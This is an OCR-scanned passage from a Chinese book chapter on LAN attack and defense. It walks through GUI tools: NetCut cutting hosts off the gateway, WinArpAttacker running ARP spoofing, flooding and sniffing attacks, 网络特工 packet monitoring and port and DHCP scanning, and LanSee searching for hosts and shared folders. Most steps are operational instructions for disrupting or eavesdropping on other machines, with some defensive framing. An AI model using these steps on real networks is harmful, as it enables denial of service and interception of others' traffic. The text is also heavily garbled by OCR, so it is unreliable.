提示 程 列表 ”选项 ， 查 看 远程 计算 机 进 和 星 来 快速 诊断 远程 计算 机 的 问题 所 在 。 


STEP03: 关闭 远程 计算 机 


注册 软件 文件 工具 信息 帮助 


如 Xx 安 的 过 9 芒 加 名 上 
添加 主机 。” 取消 主机 列表 扫 指 主机 屏幕 控制 网 络 电话 主机 信息 ” 酝 置 ”本 地 录音 录 和 多 回放 加 
才 选择 主机 192.168.10.7314 -| | 向 区 QuickIP 
远程 磁盘 抠 动 器 ol 


上 R 单 击 “ 远 程控 制 ” 下 的 “远程 关机 ”项 ， 会 弹出 对 
] os D mea 话 窗 口 询问 是 否 关 闭 ， 选 择 “ 是 ” 即 可 。 


-取消 远程 服务 器 程序 的 开机 自动 运行 
…- 澡 :打开 运程 机 的 服务 器 管理 窗口 
Dut | 三 | 


限于 篇 幅 ， 本 书 无 法 详细 讲述 该 软件 的 远程 控制 功能 ， 但 通过 上 述 的 远程 控制 应 用 可 
以 看 出 ，QuickIP 远程 控制 功能 十 分 强大 ， 有 是 网 络 管 理 员 和 有 远程 控制 需求 用 户 的 好 帮手 。 


和 1 


局 域 网 攻防 


目前 黑客 利用 各 种 专门 攻击 局 域 网 的 工具 对 局 域 网 进行 攻击 ， 鉴 于 此 ， 本 
章 向 用 户 介绍 最 常用 的 局 域 网 攻防 工具 ， 读 者 可 以 详细 了 解 这 些 工 具 的 具体 使 
用 方法 ， 还 可 以 掌握 网 络 安 全 的 相关 知识 。 


O 网 络 剪 刀 手 NetCut、WinArpAttacker 及 “网 络 特工 ” 


O 〇 O 局域网 监控 工具 LanSee 


Py > 
和- 工具 全 攻略 


14.1 | 局域网 攻击 工具 曝光 


墨客 可 以 利用 专门 的 工具 来 攻击 整个 局 域 网 , 例如 使 局 域 网 中 两 台 计 算 机 的 IP 地 址 发 


生 冲 突 ， 从 而 导致 其 中 一 台 计 算 机 无 法 上 网 。 


好 预防 工作 很 有 上 必要。 


上 所以， 了解 门 洛 攻 击 局 域 网 的 方式 并 所 前 做 


1411 网络 剪 刀 手 NetGut 切断 网 络 连 接 曝 光 


网 络 剪 刀 手 NetCut 工具 可 以 切断 局 域 网 的 任何 主机 ， 使 其 断 开 网 络 连接 ， 利 用 
ARP 协议 ， 也 可 以 看 到 局 域 网 内 所 有 主机 的 IP 地 址 ; 还 可 控制 本 网 段 内 任意 主机 对 
外 网 的 访问 , 随意 开启 或 关闭 其 Internet 访问 权限 , 而 访问 内 部 LAN 的 其 他 机 器 不 存 


在 任何 问题 。 


该 工具 的 有 具体 使 用 步骤 如 下 。 


打开 NetCut 主 窗口 


STEPOT1: 


自动 搜索 当前 网 段 内 的 所 有 
主机 的 |P 地 址 、 计 算 机 名 及 各 自 
对 应 的 MAC 地 址 。 


单 击 “ 选 择 
网 卡 ”标签 。 


STEP03: 关闭 对 网 关 的 访问 


| 呈 医 
号 
中 
呈 
| 
| 
旦 
品 
显 


选中 IP 地 址 为 192.168.0.8 的 主机 后 ， 单 击 “切断 ” 
按钮 ， 即 可 看 到 该 主机 的 “ 开 / 关 ”状态 已 经 变 为 
“ 关 ”， 此 时 该 主机 不 能 访问 网 关 也 不 能 打开 网 页 。 
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STEP02: 选择 网 卡 


Dsttansic L2 Fast Ethernet Controller [ICrosofts 二 


网 卡 傅 息 

奖 卡 : 记 ttansic L2 Fast Ethernetl Contraller [hlicrasoft's Packet 
Scheduler] 

物理 地 址 : [00:1E:8C:17B0:85 

| 月 纪 扯 T9268299] 

问 冯 : [192.168.0.1] 


单 击 “确定 ， 
按钮 。 


选择 搜索 计算 机 及 发 送 
数据 包 所 使 用 的 网 卡 。 


STEP04: 开启 对 网 关 的 访问 


| 
品 
旦 
品 
品 
品 
号 
| 


再 次 选中 IP 地址 为 192.168.0.8 的 主机 后 , 单 击 “恢复 ” 
按钮 ， 即 可 看 到 该 主机 的 “ 开 / 关 ” 状态 又 重新 变 为 
“ 开 ”， 此 时 该 主机 可 以 访问 Internet 网 络 。 


< 第 14 章 
局 域 网 攻防 


STEPOS: 


四 aliaslalaslalslalslslal:Hi 辐 国 | 


在 NetCut 主 窗口 中 单 击 “查找 ”按钮 。 输入 要 查找 主机 的 某 个 信息 ， 这 里 输入 IP 地 址 ， 单 
击 “ 查 找 ” 按 钮 。 


STEP08: 查看 局 域 网 中 所 有 主机 的 信息 


国 查看 |P 地 址 为 192.168.0.8 国 单 击 “打印 表 ” 查看 所 在 局 域 网 中 所 有 主机 的 MAC 地址 、IP 地 址 、 
的 主机 信息 。 按钮。 用 户 名 等 信息 。 


STEP09: 返回 主 春 面 


| 
; 


加 

一 mmm 一 选择 某 台 主机 后 , 单 击 二 四 按钮 ， 即 可 将 该 |P 地 址 
| 添加 到 “网 关 |P” 列表 中 ， 并 成 功 将 该 主机 的 IP 地 
地 址 设置 成 网 关 IP 地 址 。 


”有 0 了 各 有 D 有 了 有 各 有 各 有 Mo 


14:1.2 局域网 ARP 攻击 工具 WinArpAttacker 蚂 区 


WinArpAttacker 是 一 于 在 网 络 中 进行 ARP 欺骗 攻击 的 工具 , 并 使 被 攻击 的 主机 无 法 与 
网 络 进行 正常 连接 。 此 外 ， 它 还 十 一 球 网 络 咒 探 (监听 ) 工具 ， 可 虽 探 网 络 中 的 主机 、 网 
天 等 对 象 ， 也 可 进行 反 监 听 以 及 扫描 局 域 网 中 是 人 否 存在 监听 。 有 基体 的 操作 步骤 如 下 。 


二 


Py > 
具 全 攻略 


命 人 人 他 
STEP01: 安装 并 运行 WinArpAttacker STEP02: 打开 “Scan” 对 话 框 


对 Untslesd . YinarpAtiacdker 3.72 Build 2007 .02.34 
[hk Sem rack Detsct Optcrs Vis Hsip 


= I I 


-Scan range 
i Scan a host 192 . 
ff” Seam a ranee 192 . , 192 TOG 


| RES io | LUp £9 
有 Address | Wac dofess | Hostname Qnre | Srifing | Atsck | argsQ | anpsp | ArpR.| sr 了 | Re | Ti 


i Scan local networks 


SubnetlI Netnask 


192. 168. 26.1 255. 255. 255.0 
192. 168. 160. 1 区 5525552550 
192.188.1.10 255. 255. 255.0 


197.164.1. 
1924163.14 
1924654.135 
192.169,1355 
二 2 二 1 遍 
PE 


矿 Antisnift scan 


和 
MDT 3 六 HI Hap mt ere ee 


选择 “Scan” > "Advanced” 菜 单 命令 。 国 设 置 扫描 范围 并 勾 选 贺 单 击 “Scan” 按 钮 。 
要 扫描 的 IP 地 址 。 
STEP03: ”选择 绑 定 的 网 卡 和 |P 地 址 STEP04: 设置 网 络 攻击 时 的 各 种 选项 


| Adapter | httack | Update | Detect | hnalvysis | Proxy Arp | Protect | Adapter httack | wadate | Detect | hnalysis | Proxy hrp | Protect | 


Select a Network Device- -httack Time Setup- 
Adapter Vware Virtual Fthernet Mdapte hrp flood times (1-10, 000,000) aa 号 times 


Description | Ban to gatewar (1-200) FE | mlmutes 
IF Address |192. 168.26.1 到 | 要 可 
3 inutes 
| -| Min 


Subnet Nask 255. 255. 255.0 -= 4 

jo0-50-56-c0-00-08 0 Hninntes 
Gateway IP [a. 0.0.0 =| hrp spoof hosts (1-200) pv 四 minutes 
Mes Joo-o0-00-00-00-00 zz| hrp spoof lanll-200) p 图 minutes 
凡 i hrp Spoof Interval [1-200) FE | 癌 mirnutes 


Peap [\Device\HEF {4CE14355-CBAG-4CFA4-9B12-156D037CEEIGA} lV When attack stops, recover affected arp tables. 
-IF-Forwarder 


Refrekh [w hct as a gateway. [w Disable system ICMP redirect. 


取消 应 用 内 


选择 “Options > 如 果 本 地 主机 安装 有 多 除 Arp flood times 是 次 数 外 ， 其 他 都 是 持续 时 间 ， 
“Adapter” 菜 单 命令 。 块 网卡 , 则 可 在 “Adapter” 0 表示 个 停止 。 

选项 卡 下 选择 绑 定 的 网 卡 

和 |P 地 址 。 


STEP05: 切换 至 “Update” 选 项 卡 STEP06: 切换 至 “Detect” 选 项 卡 


Adapter | httack Update |Detect | Aralysls | Froxy hrp | Protect | Adapter | Attack | Update Detect | snalysis | Proxy hrp | Protect | 
-IP List Update 


[w Auto scan the lan for new computer or status. 


< w Beglm to detect as soon as this proeram starts. 
Auto scanninge interval (1-B0) FE imates M Be 人 


。 可 ， :不 和: When the speed that a host sends arp_trequest packets 
MY Vpdatel IP list from IP MAC pairs when sniffing. exceeds a certain one ll-200pps), this action is regarded 


IFP-MAL pirs as arp Scanminge. 

[w TCP $ouree Jw TCP destination 
[I¥ UDP destination 加 可 Packetsys 

[w ICMP|source [wx ICNP destination Within what interval we can gather harny Same events as 

ly ARP eply) source [w ARP (Reply) destination single event. 

[w ARF Request) source [ww ARP (Request) destination Poo 本 seconds [1-1800) 


Detect Setup 


国 设置 自动 扫描 的 和 “确定 ”按钮 。 国 设置 检测 的 频率 等 。 辆 设置 完成 后 单 击 
时 间 间 隔 。 “确定 ”按钮 。 
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局 域 网 攻防 


STEP07: 切换 至 “Analysis” 选 项 卡 STEP08: 切换 至 “Proxy Arp” 选 项 卡 


hdapter | httack | Update | Detect hnalysis | Proxy hrp | Frotect | hdapter | Attack | Update | Detect | Aralysis Froxy Mrp |Protect | 


-Analysis Setup -Proxy hrp 


|[¥ Enable Proxy hrp function. 


[w Save all arp packets to file for analysis. 

k bi When one host Fequest the mac address of another inexsit 
File [rp_pae ets. bin 到 or offline hosk, 工 will tell it a certain mac address. 

Arp packet serd mode Mac address 


I should sehd arp reply ts This host 
Packet wherl requested 
host is 人 Gateway 


鲁 ay host 个 Customize 


了 
[0-50-56-co-00-08 


车 
es Hot within this 工 ar 00-11-22-33-44-55 


Notel The dumped file is im pecap format , you could open Caution: This Eunction aims to reallre accessine the 

it with Iris or other proerams lmowine pecap format. Internet withoht ary confieure on your network, however, 
You also can cht down many hosts’ relation with others if 
7ou provide a hncorrect mac address. 


国 指定 保存 ARP 数 据 包 图 单 击 “ 确 定 " 按钮 。 图 启用 代理 ARP 功 能 。 国 单 击 “ 确 定 ” 按 钮 。 
文件 的 名 称 与 路 径 。 


STEP09: 切换 至 “Protect” 选 项 卡 STEP10: 返回 主 界 面 
亡 Untitled - WinArpAttacker 3.72 Build 2007.04.14 


hdapter | httack | Update | Detect | Aralysls | Proxy hrp Frotect | File Scan Attack Detect Options View Help 


—Protect Setup [ DD 时 Rt pe 2 Fs I. 
了 3 
| New Open Save can Attack top | Detect 


fw Enable local anti-spoof protect | Dne Times/ 6 pn 


CO 


When a host’s physical address in local arp entry Was 
chaneed, maybe someone 15 spoofine vou. Winhrphttacker IP Address Mac Address Flood 


will recower it with host list’ s address automatically. | 
Winhrphttacker will also tell eateway correct mac address DO 192.168.1.1 00-30-36-C0 0 BanGateway 


of local host regularlylone times eyery 1-B0 second, m192,168.1.4 90-2B-34-09- vb 
0 means dom t do so). | IP Conflict 、\ 
IEf you enable it your host can be immune from many 0 192.168.1.10 90-2B-34-09-7 


arp-spoof attacks. 口 192.168.1.100 90-28-34-09-7| Sniff Gateway 
[ Enable remote anti-spoof protect | Snif Hosts 


-9 


When Wirhrphttacker detects arp-spoof attack (httack Spoof ;在 
,httack Spoof Ban hccess),it will recower Yictims” arp Snitf Lan 
entry based on host list. ， 


If you enable it you can protect some hosts from arp-spoof 
attack, but all arp attacks arlsed by you will be in valr 
because remote host’s arp entry will be recovered by 
Wirhrphttiacker immedately. 


取消 


国语 用 本 地 和 远程 防 欺骗 单 击 “ 确 定 ” 选取 需要 攻击 的 主机 后 , 单 击 “Attack” 按钮 右 侧 

保护 功能 ， 和 避免 自己 的 主机 按钮 。 的 下 拉 按 钮 ， 选 择 攻击 方式 。 受 到 攻击 的 主机 将 

受到 ARP 欺骗 攻击 。 不 能 与 Internet 网 络 进行 正常 连接 , 单 击 “Stop” 
按钮 ， 则 被 攻击 的 主机 恢复 正常 连接 状态 。 

如 末 使 用 了 唱 探 放 击 ， 则 可 单 击 “Detect” 按 钮 开始 吕 探 。 单 击 “Save” 投 钮 ， 可 将 主 

机 列表 保存 下 来 ,最 后 单 击 “Open” 按 钮 ， 即 可 打开 主机 列表 。 如 果 用 户 对 ARP 包 的 结构 

比较 熟悉 且 了 解 ARP 攻击 原理 ， 则 可 目 己 动手 制作 攻击 包 ， 单 击 “Send” 按 钮 进行 攻击 。 


个 ArpSQ 是 该 机 器 的 发 送 ARP 请 求 包 的 个 数 ; ArpSP 是 该 机 器 的 发 送 回 
应 包 的 个 数 ; ArpRQ 是 该 机 器 的 接收 请 求 包 的 个 数 ; ArpRP 是 该 机 器 的 接 


提示 收回 应 包 的 个 数 ， 
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NTZI 一 _ 


工具 全 攻略 


合 人 他 他 


14:1.3 “网 络 特工 ” 监 届 效 据 具 区 


网 络 特工 可 以 监视 与 主机 相连 的 Hub 上 所 有 机 器 收发 的 数据 包 ; 还 可 以 监视 局 域 网 内 
所 有 机 器 的 上 网 情况 ， 以 对 非法 用 户 进行 管理 ， 并 使 其 登录 指定 的 IP 网址 。 
使 用 “网 络 特工 ”的 具体 操作 步骤 如 下 。 


STEP01: 打开 “网 络 特 工 ” 主 窗口 STEP02: 打开 “选项 ”对 话 框 


病 Kennear - 网 络 竺 工 


一 启动 杂项 


= 局 ES 三 操作 系统 自动 时 自动 运 2 行程 序 | lv 退出 程序 时 需要 密码 验证 
网 卡 安 各 Device\HPF 12F5oFB3 ‘DovicoiPp {ASCIBG | 厅 程序 启动 时 显示 系统 托盘 图 标 | | 厅 不 显示 广告 (需要 重新 运行 程序 ) 


网 卡 
El Rr hare -i PeI | 网 Atheros ARB1S1 PCI-E... VirtualBox Host-Only... 2 于 A 
: 昼 生 时 902B340970DD 08002700E8CA lv 程序 启动 时 显示 主 窗口 | | 厂 启动 时 不 显示 程序 L060 
“交管 右键 点 192. 168. 1. 10 192. 168. 56. 1 | 
255. 255. 255.0 255.255. 255.0 
192. 168. 1.1 0.0.0.0 


-全 局 起 刍 


显示 /隐藏 主 窗口 热 键 :|Ctrl + Shift + ALt + 于 


三 执 键 显示 主 窗口 时 需要 密码 验证 


E :Users\hDNMINI 1\Applata\Local\TempRar$EXaD. 2 


选择 “工具 ”>“ 选 项 ”菜单 命令 。 设置 启动 、 全 局 热 键 等 属性 ， 单 击 “OK” 按 钮 。 


STEP03: 返回 “网 络 特 工 ” 主 窗口 STEP04: 打开 “添加 新 网 段 ” 对 话 框 


大 Kennear - 网 络 等 工 
文件 (FP) ” 查 春 (V) 工具 (T) 帮助 (H) 


网 段 开始 IF 地 址 : Ea . 168 


902B340970DD-26C210A89AEB6 
902B340970D0D->8C210A89hEPB 
8C210A89AEB6-2902B340970DD 
8C210A89AEB6- >902B340970DD 
902B340970DD- >8C210A89hEPB 
8C210A89AEB6- >902B340970DD 
8C210A89AEB6- >902B340970DD 
ee TD 20C210AB9AEBE 
60_ 6=- >902B340970DD 


卫 段 结束 IF 地 址 : 192 


902B340978BA 233330000000C 
902B340970DIDT26C210A69AEBB 
8C210A89AEB6T2902B340970DD 
902B340970DDT >8C210A89hEEB 


网 段子 网 撞 码 : 255 . 255 


到 


PFabg 寺 TP 地 址 : Lg 
证 > 到 
数据 包 过 涯 字符 串 : 


国 单 击 ' 数 据 监 视 , 设 ” 国 右 击 “ 网 络 管理 " ， 设置 网 络 的 开始 IP 地 址 、 结 束 IP 地 址 、 子 网 掩 码 、 
置 要 监视 的 内 容 ， 单 击 网 关 IP 地 址 之 后 ， 单 击 “OK” 按 钮 。 
“开始 监视 ”按钮 。 择 “ 添 加 新 网 段 " 命令 。 
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主 窗 口 


STEP05: 返回 “网 络 特工 ” 


各 Kennear - 网 络 特工 
文件 旧 “ 坦 看 (V) 工具 (D 帮助 (H) 
EXE 


日 . 找 的 网 卡 
器. ee AES15- PCI-E Gieabit Eiher 


数据 监视 
蝗 网 络 管理 顺 建 点 击 添加 网 自 ] 
:网 段 192. 166.1.2 - 192.166.1.3 
软件 检测 
:… 互联 星空 


回 .YirtuslBox Host-Only Ethernet hdap 
3 过 1 


-数据 上 监视 
- 网络 管理 寺 键 点 击 添加 网 也) 
-软件 检测 
.互联 星空 


ws 

192. 168.1.2 
192. 168. 1. 253 
255.255,255.0 
192. 168.1. 1 


查看 新 添加 的 网 段 并 双击 该 网 段 。 


STEP07: 打开 “网 段 参 数 设置 ”对 话 框 
网 段 参 数 设置 | 


基数 
使 用 虚拟 IF 地 址 : [EEC 可 网 络 带 席 : 上 行 | 所 KB/S 下 行 


管理 主机 频率 : 六 -一 每 10.000 秒 一 次 ”管理 路 由 频率 : 


128 KB/S 


| 每 30.000 秒 一 次 


第 蜂 


厂 不 自动 扫描 网 段 
厂 当 RB0 
在 J60 


[Y 保护 自己 不 被 其 它 软 件 管理 上 网 。 厂 锁定 网 关 呐 C5 物理 地 址 
分 钟 后 未 从 被 管理 主机 收 到 任何 数据 , 或 者 。 信 主机 抵抗 管理 时 , 启用 特殊 管理 策略 
分 钟 后 恢复 正常 管理 策略 . 


提示 ] 日 志 
厂 全 部 选择 厂 全 部 选择 
厂 上 线 提示 厂 上 线 日 志 
厂 下 线 提示 厂 下 线 日 志 
厂 多 回应 提示 厂 多 回应 日 志 
厂 工作 组 消息 提示 厂 工作 组 消息 日 志 


厂 更 换 MAC 地 址 提示 
厂 管理 提示 

厂 防御 提示 

厂 网 址 映射 提示 


厂 更 换 MAC 地 址 日 志 
厂 管理 日 志 

厂 防御 日 志 

厂 网 址 映射 日 志 


Ce co | 
对 各 个 网 络 参 数 进行 设置 ， 单 击 “OK” 按 钮 。 


STEP09: 打开 “网 址 映射 列表 ”对 话 框 


网 址 呐 射 列 雪 
输入 要 解析 的 网 址 要 输入 http: /站 起 时间: [io 条 开始 解析 


ee 


服务 器 返回 信息 : 


52 e151 
202 106.0.20 


mr | 辽 册 7 


192. 168. 1. 10 
不 映射 www. Kennear. com 
a 要 输入 前 纺 http:11】 双击 此 处 输入 帅 射 TP WY4) 双击 此 处 输入 映射 TP 对 应 网址 


添加 是 除 ox | | 
选中 要 解析 的 DNS 服务 器 后 ， 单 击 “ 开 始 解析 
按钮 。 


STEP06: 


大 Kennear - 网 络 等 工 


查看 设置 网 段 的 所 有 信息 


文件 (有 ” 吾 看 (V) “工具 (T) “帮助 (站 


EX 


日 -我 的 网 
日- Atheros ,ARB1S1 PCI-E 
: 5 
- 陪 段 192. 1656.1.3 
软件 机 
互联 星空 
白 - VirtualBox Host-Only 


网 站 芝 [6 衬 点 二 
软件 检测 
-互联 星空 


192. 168. 1. 12 
192. 168. 1. 13 
192.168.1.14 
192. 188. 1. 15 
192. 168. 1. 16 
192. 168.1.17 
192. 188. 1. 18 
192.168.1.19 
192.168.1.20 


IT 


网 段 开始 TI? 地址: 
网 段 结束 I? 地 址 : 
网 段子 网 接 码 : 


ER : 


园 查看 设置 网 段 的 所 
有 信息 。 


STEPO8: 


大 Kennear - 网 络 符 工 


192.188.1 2 在 线 : 4 


192. 168. 1. 253 高 线 : ”248 
255. 255. 255.0 管理 : 0 管理 参数 设 园 


to 108:053 设置 防水 墙 规 则 | ”| 网址 映射 列表 


单 击 “管理 参数 
设置 ”按钮 。 


返回 主 窗口 


i Ei 


| 吕 5r|| 


日 -我 的 
局: 了 tharos 站 PCI-E 


i 六 * 数 

由 生生 人 机 

i | -R192. 188. 1.3 
软件 闪光 

| 互联 星空 

白 . VirtuelBox Host-Only 


下 全 键 点 击 ; 


-软件 检测 
-互联 星空 


在 线 2014-09-16 13:37:43.975 


网 段 开 始 IT 地 址 ; 


了 网 引 结 束 IT 地 址 ; 
hie 


1 8C210AB9AEBS 


192. 168. 1.2 
192. 168. 1. 253 离线 : 
255. 255. 255.0 管理 ; 


192.100.1.1 设 阁 防水 声 规 刚 | 网 址 映 冉 列 表 | 


单 击 “网 址 映射 列表 ”按钮 。 


STEP10: 


对 选中 的 DNS 服务 器 进 


行 解析 


网 址 时 射 列表 这 | 
输 六 要 解析 的 网 址 (不 要 输入 http:77: 超时 时 间 : |10 种 


请 点 击 选择 DNS 服务 器 : 


ee 加 管 数 1， 受权 信息 数 0， 附 加 信息 数 0: 


: Www. kennear, ¢ 


i 
[全 61 80 < 117 


192. 166.1.10 


本 br 和 和 


ww he kennear,. com 不 里 二 
双击 此 处 输入 要 被 映射 的 网 址 不 要 输入 前 缕 http:/ 放 和 nt Gd) rt 


[Ug | Cancel | 


待 解析 完毕 后 ， 


属性 ， 然 后 单 击 “OK 


可 看 到 该 域名 对 应 的 主机 地 址 等 


按钮 。 
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具 全 攻略 


合 人 他 他 


STEP11: 返回 “网 络 特 工 ” 主 


窗口 


中 | 在 线 2014-09-18 13:37:43.803 902B340978BA 


192. 166. 1. 14 
192. 168. 1. 15 
192. 168. 1. 16 
192. 168. 1, 17 
192. 168. 1. 18 
192. 168. 1. 19 
192. 185. 1. 20 


2014-09-16 13:37:43.975 9025340976F7 


S DOE 


Ud 


网 段 开始 IT? 地址 : 192. 168.1 2 


单 击 “ 互 联 星空 ”选项 。 


STEP13: 打开 “端口 扫描 参数 设置 ”对 话 框 
If 版 本 : | ~| 协议 类 型 : [TCF | 厂 显示 扫 指 进度 


192; 168: 1: 2 


端口 扫 摘 参数 设 早 


192. 168. 1. 253 

导入 0-65535 
三 他 也 用 
未 汉 
围 ) 


司 用 凡 [ 地 扯 ”|30RB340970DD 


和 II 地 址 【1 168.1.10 


进行 扫 损 


设置 起 始 和 结束 IP 地 址 后 , 单 击 “常用 端口 按钮。 


STEP15: 进行 扫描 端口 


'®@ Kennear - 网 络 符 工 
文件 (有 ”查看 (V) 工具 (T) 帮助 (H) 
ET 


ET 67 
st DR 
teros Mats! zc | ers 有 
i (十 键 点 击 ; 
| 一 网 聘 192.166.1.3 


白 而 tual Box a 


| 十 刍 点击 
:软件 检测 
互联 旦 空 


3 I i re 
D? ie 183 1 
芒 和 192 zt 
卫 为 ,的 生机 不 和 

4 开始 ?他 19 的 主机 
也 为 入 本寺 生机 下 
13:44: 55 开始 接生 有 19 的 .1.10 的 主机 
了 为 182. 158. 1.10 的 三 
13:44:56 开始 扫 换 IF 为 192 Ex 的 主机 ... 
也 为 192 168.1.11 
13:44: T 开始 扫 中 1 的 1 12 的 主机 


ID 为 沈 168.1.12 的 主 
3 指 IP 为 192 1 人 119 的 主机 

了 为 192. 168. 1.13 的 主 
为 192. 168. 1 14 的 主机 ... 


:59 
为 le2. 168.1.14 = 
192. 168.1.15 1 
ER 2 192. 168.1.15 st! 139 


显示 扫描 结果 ， 在 其 中 可 看 到 各 个 主机 开启 的 端口。 
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STEP12: 打开 “互联 情况 ”窗口 


六 Kennear - 网 络 符 工 
文件 (H。 坦 看 (V) 工具 (T) 帮助 (H) 


日- 我 拉 同 卡 EE 
日 Atheros p8151 PCI-E | | nice 服务 汪 攻 扫 相 局 0 内 的 HP 服 务 如 ,并 取得 一 个 未 被 全 用 级 1? 地 


开始 | 


可 进行 扫描 端口 和 DHCP 服 务 操 作 。 在 列表 中 选择 
“端口 扫描 ”选项 后 ， 单 击 “ 开 始 ” 按 钮 。 


STEP14: 查看 常用 的 端口 


端口 扫描 参数 设置 


IF 版 本 : [IPw4 ”| 协议 类 型 : [TcF | 厂 显示 扫描 进度 
起 始 IF: [i92. 168.1.2 
OK | 
结束 IF: [192. 168. 1. 253 
Cancel | 


端口 型 表 : 21,23, 25,53,80, 110, 135- 
] 刁 139, 161, 443， 8010， 8080 


GE 


= 表 趟 沁 
围 ) 


侍 用 Mc 地 址 Ia02B340970DD 


和 和 IPF 地址 [192.188.1.10 


进行 扫描 


显示 单 用 的 疹 口 ， 单 击 “OK” 按 钮 。 


STEP16: ”DHCP 服务 扫描 操作 


@ Kennear - 网 络 符 工 Ca 


文件 (月 ”到 看 V) 工具 (本 助 (H) 
L221 


ER [本 Br 
8- Atharos ee PCI-E | 苞 CT a EE 网 内 上 IDHCI 有 E 务 芝 并 取得 一 个 未 被 使 用 的 T 地 ,. 
a 


| -PIR192. 168.1. 


日 WirEaalBex Host-0rly 
上 双 络 管理 而 甸 点击 当 


IF (1): 122. 125.81.6 
EC ; 114. 114. 114. 114 
1' 


; !23.125.81.6 
全: 和 114.114. 114 


4: 5 i 


Ba ee Be 六 确 
JIS 服务 器 IF (1) 任 125 61.6 


168.1.1 
用 的 下 地 址 是 : 192. 168. 1. 108 


INS 服 务 二 IF (2); 114.114 114. 114 
ITHCH3 摘 任务 完成 | 


在 "互联 旺 裤 " 窗 二 倍 这 振 “DHCP 服 务 扫描 " 选 
页 ， 单 击 “开始 ”按钮 , 开始 DHCP 服 务 扫描 操作 。 


< 第 14 章 
局 域 网 攻防 


14.2 ”局域网 监控 工具 曝光 


利用 专门 的 局 域 网 监控 工具 可 查看 局 域 网 中 各 个 主机 的 信息 ， 本 节 将 介绍 非常 方便 实 
用 的 局 域 网 监控 工具 LanSee。 

针对 机 房 中 的 用 户 经 常 误 设 工作 组 、 随 意 更 改 计 算 机 名 、IP 地 址 和 共享 文件 夹 等 情况 ， 
可 以 使 用 局 域 网 查看 工具 LanSee 非常 方便 地 完成 监控 ， 既 可 以 迅速 排除 故障 ， 叉 可 以 解决 
一 些 潜在 的 安全 隐患 。 

1. 搜索 计算 机 

LanSee 是 一 蒜 主 要 用 于 对 局 域 网 (Internet 上 也 适用 ) 上 各 种 信息 进行 得 看 的 工具 ， 采 
用 多 线程 技术 ， 将 局 域 网 上 比较 实用 的 功能 完美 地 融合 在 一 起 ， 功 能 十 分 强大 。 

使 用 LanSee 工具 搜索 计算 机 的 具体 操作 步骤 如 下 。 


STEP01: 打开 “局 域 网 查看 工具 ” 主 窗口 STEP02: 切换 至 “搜索 计算 机 ”选项 卡 


峭 局 域 网 查看 工具 (LanSee) V1.72[ 未 注册 ] 

em ee 所 过 | 起码 T 段 结束 T 段 
工具 选项 .。 、 rE Uy a 择 局 末 192. 168. 1 192. 168. 1 
工具 时 示 -， 具 


192. 168. 160 192. 166. 160 


浏览 结束 任务 | 组 件 管理 更 新 升级 | ”退出 击 网 络 嗅 探 192. 168. 26 192. 168. 26 


区 件 来 路 径 


四 PP 


起 始 IF 段 加 | 发送 AEP 请 求 
更 新 | 添加 |] | 遇 除 清空 “| | 默认 设置 


选择 “设置 ”>“ 工 具 选 项 ”菜单 命令 。 设置 在 局 域 网 内 搜索 计算 机 的 搜索 范围 。 


STEP03: 切换 至 “搜索 共享 文件 ”选项 卡 ”STEP04: 切换 至 “扫描 端口 ”选项 卡 


二 搜索 计算 机 
者 | 搜索 共享 文件 I 地址 端口 
总 局 域 网 聊天 192. 168.1 139 
例 , 扫描 应 口 站 id 192. 168. 1.8 445. . 1024 


匡 地 址 
文件 大 小 0 超时 os) 2000 归 除 
保存 


输入 文件 类 型 并 单 击 “ 添 加 ”按钮 ， 添 加 新 的 文 ”添加 所 要 扫描 的 端口 后 , 单 击 “保存 ”按钮 。 
件 格 式 。 
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ST IF 一 一 


工具 全 攻略 


全 人 人 他 
STEP05: 返回 “局 域 网 查看 工具 ” 主 窗 口 


匡 局 域 网 坦 看 工具 (LanSee) V1.72[ 未 注册 ] 
设置 ”任务 ， 坦 看 (V) 组 件 ”帮助 (H) 
物 2 | gz 名 | D | 线程 政 [32 | 确定 
二 > 定 
工具 选项 工具 最 示 | 任务 浏览 结 训 任务 | 组 件 管理 更 新 升级 | 至 出 ait 
IP 地 址 计算 机 名 工作 组 HAC 地址 用 户 名 a 
192. 168.1.10 90.28. 34. 09. 70. nD 
192.168.1.1 8C. 21. 0A. 89. 4E. B6 
192, 168, 1.55 90.23. 34. 09.76.F4 
192.168.1.88 ZKG WORKGROUP C8.60. 00. 78. 58. AE 
192. 100.1 1 100 SZT-FC WORKGROUP 90. 28. 34. 09. 70. 49 
在 本 :mn NNivTo VUC WY ~pMre NN ND ?a_n Tr Te 
«| ED u 上 
共享 资源 所 在 的 计算 机 二 | 共享 文件 所 在 的 目录 ”二 
品 4 靖 品 192. 168. 1. 88 引 区 11. ipz M92. 166. 1. 
Docunents 192. 168. 1. 88 强 1212. jpg M192, 168. 1. 
| 各 LaserJet Profes... 192.1868.1.88 BF 4F1TOO02T. JPG 192. 168. 1. 
kadPictures 192. 168. 1. 88 -| 盛 4rlroo47. Je WA192. 168.1. ~ 
4 | 如 < | 是 
a 机 本 
网 7254 不 现 要 汗 有 有 
7:36:46] | 鲁 潜 、 


37:15] 


T: i 
| 本 和 二 tg 


LsnSee 空 间 


单 击 “ 开 始 ” 按 钮 ， 即 开始 搜索 。 
STEP07: 输入 用 户 名 和 密码 


Windows 安全 


输入 网 络 密 码 
樟 入 您 的 密码 来 这 接 到 : 192.168.1.102 


2. 搜索 共享 资源 


STEP06: ”打开 并 连接 搜索 的 计算 机 


请 局 域 网 查看 工具 (LanSee) V1.72[ 未 注册 ] 
设置 任务 ”查看 (V) 组 件 2 


日 多 | 入 


as| < 任务 浏览 了 组 件 管理 更 新 升级 | 《退出 


全 .192. 1RS An 
| 由 192. 打开 计算 机 
搜索 计算 机 时 192. 保存 


EDEL. WORKGROUP 
起 0192. 168. 1. 100 = WORKGROUP 


a 主 汪 ,nc 1co 1 1np 1 1 unpumpnlrc 


主机 坊 测 | 


所 在 的 计算 机 
192. 168. 1. 88 
设置 共享 资源 192. 168. 1. 88 
192. 168. 1. 88 
192. 168. 1. 88 


在 选 定 的 IP 地 址 上 右 击 ， 选择 “打开 计算 机 ”命令 。 


输入 用 户 名 和 密码 后 单 击 “确定 ” 按钮 ， 即 可 与 
此 计算 机 建立 连接 。 


共 衬 资源 往往 是 局 域 网 数据 泄密 的 “ 徘 魁 福 首 ”网 络 管理 员 要 经 铝 检 查 局 域 网 中 是 否 
存在 一 些 不必 要 开放 的 共 孚 资源 。 在 得 看 到 不 安全 因素 后 ， 要 及 时 通知 开放 共 孚 的 用 户 将 


其 关闭 。 


